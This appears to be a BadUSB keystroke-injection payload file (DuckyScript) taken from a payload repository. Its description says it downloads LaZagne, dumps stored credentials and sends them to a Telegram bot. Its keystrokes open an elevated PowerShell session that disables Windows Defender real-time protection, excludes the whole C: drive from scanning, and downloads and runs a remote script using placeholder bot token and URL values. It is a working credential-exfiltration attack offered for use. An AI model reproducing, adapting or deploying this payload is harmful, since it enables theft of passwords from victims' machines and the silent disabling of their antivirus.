Path: blob/master/payloads/library/exfiltration/Lazagne-Exfil/payload.txt
2968 views
REM Title: Lazagne Exfiltration1REM Author: mrproxy2REM Requirements: Telegram bot, Internet Connection3REM Description: Downloads lazagne, runs lazagne, stores all info to .txt file, sends file to telegram bot.4REM Target: Windows5REM Version: 1.06REM Category: Exfiltration7REM Source: https://github.com/Mr-Proxy-source/BadUSB-Payloads89REM Remember you will have to host the powershell script yourself on any file sharing service (it has to be direct download link)10REM If you are using DropBox, just remember to change it from ?dl=0 top ?dl=111DEFINE #SCRIPT_URL example.com/payload.ps1?dl=11213REM Here you will have to put your telegram bot details14DEFINE #BOT_TOKEN your-bot-token15DEFINE #CHAT_ID your-chat-id1617DELAY 150018GUI r19DELAY 50020STRING powershell.exe -Command "Set-MpPreference -DisableRealtimeMonitoring $true; Add-MpPreference -ExclusionPath 'C:\'; Start-Sleep -Seconds 5; powershell -w h -NoP -Ep Bypass -Command '$bt='#BOT_TOKEN'; $ci='#CHAT_ID'; irm #SCRIPT_URL | iex'"21CTRL-SHIFT ENTER22DELAY 100023ALT y242526